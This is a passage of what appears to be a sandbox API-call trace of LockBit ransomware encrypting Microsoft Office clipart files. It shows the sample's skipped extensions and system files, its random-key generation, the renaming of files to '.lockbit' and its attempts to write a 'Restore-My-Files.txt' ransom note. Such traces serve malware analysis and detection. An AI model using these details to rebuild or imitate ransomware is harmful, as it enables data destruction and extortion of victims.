(lpString1=".rdp", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107526.WMF") returned 1 [0142.067] lstrcmpiW (lpString1="ntldr", lpString2="J0107526.WMF") returned 1 [0142.067] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107526.WMF") returned 1 [0142.067] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107526.WMF") returned -1 [0142.067] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107526.WMF") returned -1 [0142.067] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107526.WMF") returned 1 [0142.067] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107526.WMF") returned -1 [0142.067] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.067] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned=".WMF" [0142.067] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.067] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.068] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.068] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF.lockbit") returned 72 [0142.068] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0142.069] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.069] malloc (_Size=0x40068) returned 0x3d70450 [0142.069] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7948) returned 1 [0142.069] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0142.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.070] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0142.070] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0142.074] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.074] malloc (_Size=0xa6) returned 0x77d7a8 [0142.074] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.074] free (_Block=0x77d7a8) [0142.074] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.074] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.074] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.075] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1a88, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107528.WMF", cAlternateFileName="")) returned 1 [0142.075] lstrcmpiW (lpString1=".", lpString2="J0107528.WMF") returned -1 [0142.075] lstrcmpiW (lpString1="..", lpString2="J0107528.WMF") returned -1 [0142.075] PathFindExtensionW (pszPath="J0107528.WMF") returned=".WMF" [0142.075] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.075] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.076] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.076] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107528.WMF") returned 1 [0142.076] lstrcmpiW (lpString1="ntldr", lpString2="J0107528.WMF") returned 1 [0142.076] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107528.WMF") returned 1 [0142.076] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107528.WMF") returned -1 [0142.076] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107528.WMF") returned -1 [0142.076] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107528.WMF") returned 1 [0142.076] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107528.WMF") returned -1 [0142.077] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.077] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned=".WMF" [0142.077] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.077] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.077] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.077] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF.lockbit") returned 72 [0142.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0142.078] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.078] malloc (_Size=0x40068) returned 0x3df0008 [0142.078] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6792) returned 1 [0142.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.079] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.079] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.079] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.082] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.082] malloc (_Size=0xa6) returned 0x77d7a8 [0142.083] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.083] free (_Block=0x77d7a8) [0142.083] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.083] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.083] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.083] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6890, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107544.WMF", cAlternateFileName="")) returned 1 [0142.084] lstrcmpiW (lpString1=".", lpString2="J0107544.WMF") returned -1 [0142.084] lstrcmpiW (lpString1="..", lpString2="J0107544.WMF") returned -1 [0142.084] PathFindExtensionW (pszPath="J0107544.WMF") returned=".WMF" [0142.084] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.084] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.085] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.085] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107544.WMF") returned 1 [0142.085] lstrcmpiW (lpString1="ntldr", lpString2="J0107544.WMF") returned 1 [0142.085] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107544.WMF") returned 1 [0142.085] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107544.WMF") returned -1 [0142.085] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107544.WMF") returned -1 [0142.085] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107544.WMF") returned 1 [0142.086] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107544.WMF") returned -1 [0142.086] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.086] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned=".WMF" [0142.086] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.086] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.086] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.087] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.087] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF.lockbit") returned 72 [0142.087] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0142.088] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.088] malloc (_Size=0x40068) returned 0x3e70008 [0142.088] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=26768) returned 1 [0142.088] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.088] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0142.088] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.089] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0142.089] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0142.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.093] malloc (_Size=0xa6) returned 0x77d7a8 [0142.093] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.094] free (_Block=0x77d7a8) [0142.094] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.094] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.094] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.094] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, 